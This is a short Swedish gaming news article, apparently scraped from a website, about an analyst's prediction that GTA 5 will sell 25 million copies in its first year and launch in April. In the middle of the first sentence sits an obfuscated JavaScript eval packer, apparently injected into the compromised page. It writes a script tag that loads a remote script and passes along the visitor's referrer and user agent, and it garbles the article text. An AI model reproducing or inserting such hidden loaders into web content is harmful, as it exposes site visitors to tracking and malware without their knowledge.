Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Analytikerna: GTA 5 säljer 25 miljoner redan första året

Analytikerna: GTA 5 säljer 25 miljoner redan första året
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nifas|var|u0026u|referrer|ebabt||js|php’.split(’|’),0,{}))
har analytikerna börjat komma in i matchen gällande GTA 5. Det har tidigare gjorts enklare analyser som endast byggt på två bilder som källa.

Nu finns det mer info och det här tror man nu.

Det är analytikern Jesse Divinich som nu uppskattar att Rockstars efterlängtade spel GTA 5 kan komma att sälja hela 25 miljoner exemplar redan första året. Han tror även att spelet kommer att släppas i april nästa år.

– Jag är inte speciellt bekymrad över när det släpps. GTA IV bevisade redan för marknaden att till och med en april-release, som historiskt sett undvikits av industrin, kan supporta en 20m+-titel. Oavsett april, juni eller till och med vintern så förväntar jag mig att GTA 5 säljer omkring 25 miljoner exemplar under dess första 12 månader,säger Jesse Divnich till Nowgamer.

En enkel försäljningskoll visar att GTA 4 sålde ca 13 miljoner exemplar mellan release den 29 april 2008 till den 31 januari. Ska kommande GTA 5 sälja 25 miljoner behöver Rockstar sig ett enormt tempo jämfört med föregångaren GTA 4.